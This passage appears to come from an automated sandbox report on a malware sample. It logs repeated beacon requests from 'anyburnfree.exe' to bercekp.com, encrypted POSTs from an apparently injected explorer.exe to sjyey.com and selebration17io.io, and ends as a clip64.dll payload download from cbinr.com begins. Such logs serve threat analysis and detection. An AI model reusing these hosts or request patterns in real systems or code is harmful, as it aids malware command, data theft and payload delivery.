                                                                                                                                                                    185192.168.2.349963185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:40.552763939 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:40.791104078 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:40 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    186192.168.2.349964185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:41.149955034 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:41.386267900 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:41 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    187192.168.2.349965185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:41.816508055 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:42.053044081 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:41 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    188192.168.2.349966185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:42.432770967 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:42.669457912 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:42 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    189192.168.2.349968185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:43.052409887 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:43.289731979 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:43 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    190192.168.2.349969109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:43.229326010 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ggvrtjlquqrnge.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 273
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:11:43.229389906 CET273OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 71 0c c8 ec
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA .[k,vuq9Yde<wWm{jgH|fWH4eD-=A#AXqp+MNe}yMS!(a%belLm(u7ya:>
                                                                                                                                                                    Feb 8, 2024 19:11:43.651783943 CET252INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:43 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 7
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                                    Data Ascii: r


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    191192.168.2.349970185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:43.720582008 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:43.959074974 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:43 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    192192.168.2.34997191.215.85.12080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:43.757719040 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://saofaiqxfrhu.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 292
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:11:43.757719040 CET292OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 ea ad 1f c9
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bO=sPQPdjA"zwFez_*9JJ>/,otLS.n4Wil[kqY@>8K_!8/ |.Y~F)f5
                                                                                                                                                                    Feb 8, 2024 19:11:44.016264915 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:43 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 7=[0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    193192.168.2.349972185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:44.330940962 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:44.572316885 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:44 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    194192.168.2.349973185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:44.943420887 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:45.180461884 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:45 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    195192.168.2.349974185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:45.608191967 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:45.845632076 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:45 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    196192.168.2.349975185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:46.252701044 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:46.489343882 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:46 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    197192.168.2.349976185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:46.846213102 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:47.082822084 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:46 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    198192.168.2.349977185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:47.481631994 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:47.718501091 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:47 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    199192.168.2.349978185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:48.086590052 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:48.324836969 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:48 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    200192.168.2.349979185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:48.682070971 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:48.920840025 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:48 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    201192.168.2.349980185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:49.333275080 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:49.569668055 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:49 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    202192.168.2.349981185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:50.077847958 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:50.314620018 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:50 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                    203192.168.2.349982109.175.29.3980
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:50.520760059 CET59OUTGET /forum/Plugins/clip64.dll HTTP/1.1
                                                                                                                                                                    Host: cbinr.com
                                                                                                                                                                    Feb 8, 2024 19:11:50.926274061 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:50 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    Last-Modified: Thu, 12 Oct 2023 08:02:12 GMT
                                                                                                                                                                    ETag: "19800-607805b770900"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 104448
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: application/octet-stream
